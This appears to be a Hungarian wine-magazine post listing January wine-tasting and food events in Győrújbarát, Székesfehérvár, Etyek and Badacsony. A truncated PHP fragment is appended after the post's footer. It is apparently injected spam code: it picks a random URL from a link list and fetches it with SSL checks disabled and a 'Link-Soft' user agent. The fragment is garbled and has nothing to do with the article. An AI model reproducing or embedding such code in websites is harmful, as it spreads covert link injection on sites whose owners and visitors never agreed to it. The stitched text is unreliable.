Januári programajánló

Január a nagy álmok és a még nagyobb fogadalmak időszaka. Ilyenkor tele vannak az edzőtermek, rengeteg terv és vágy kerül a naptárakba és naplókba. Ám ugyanilyen fontos, hogy a komoly elhatározások mellett az örömökre és a kikapcsolódásra is hagyjunk időt az új évben. Ehhez ajánlunk most kellemesnek ígérkező boros programokat. Friss Jazz Ünnep 01. 12.... View Article


Január a nagy álmok és a még nagyobb fogadalmak időszaka. Ilyenkor tele vannak az edzőtermek, rengeteg terv és vágy kerül a naptárakba és naplókba. Ám ugyanilyen fontos, hogy a komoly elhatározások mellett az örömökre és a kikapcsolódásra is hagyjunk időt az új évben. Ehhez ajánlunk most kellemesnek ígérkező boros programokat.

Friss Jazz Ünnep 01. 12.

Győrújbarát Közösségi Tér és Könyvtár

A Pannonhalmi borvidék 13 pincészete teszi tiszteletét Győrújbaráton, a Művelődési Házban, ahol bemutatják 2018 friss tételeit. A sétálókóstolón a hazai jazzélet kiválóságai biztosítják a remek zenét és a jó hangulatot. A vendégek fényfestett környezetben élvezhetik a mesterszakács által készített ételeket, amelyek mindegyikét egy-egy bor ihlette, továbbá a Törley Pezsgőmanufaktúra tételeit, sajtokat és borkoktélokat is kóstolhatnak.

Facebook

IV. Nagy Fehérvári Bormustra 01. 12.

Szent István Hitoktatási és Művelődési Ház

23 pincészet több mint 110 féle bora lesz kóstolható a már hagyományos Nagy Fehérvári Bormustrán, a Szent István Hitoktatási és Művelődési Házban. Mivel Fejér megyében két borvidék is található (az Etyeki és a Móri), a Nagy Fehérvári Bormustra mindig a kisebb, környékbeli pincészetekre fókuszál elsősorban, a szervezők ugyanis fontosnak tartják, hogy bemutatkozási lehetőséget biztosítsanak a kevésbé ismert termelők számára. A finom falatokról immár hagyományosan a Hatpöttyös Étterem gondoskodik. Az egyszeri belépőjeggyel korlátlan borfogyasztáshoz, egy szép kóstolópohárhoz és egyéb meglepetésekhez juthatnak hozzá a vendégek!

Facebook

Téli Etyeki Piknik 01. 19.

Gasztrosétány

Január harmadik hétvégéjén, a farsangi időszak kezdetén Etyeken a téli időszak hangulatát a gőzölgő italok és a toros ételek teszik feledhetetlenné. Huszonegy helyszínen kóstolhatunk bele a tél ízeibe a kocsonyától a lencselevesen át fekete szedres forralt rozéig és a forró csokoládéig, az etyeki borászatok tételei mellett pedig hagyományosan vendégborászok is bemutatkoznak Balla Gézától Maurer Oszkáron át Áts Károlyig.

Facebook

Nagyvadak a hegyről 01. 25-28.

Badacsony

Bemutatkozik a Badacsony egy olyan arca, melyet csak ilyenkor, a nyugodtabb évszakok során lehet felfedezni. A hegy vendéglátói és mindenkit arra invitálnak, hogy ismerje meg Badacsonyt fogásról fogásra – ezúttal vadételek és az erdő termései kerülnek a badacsonyi borok mellé.

Facebook

(Visited 1 times, 1 visits today)

The post Januári programajánló appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>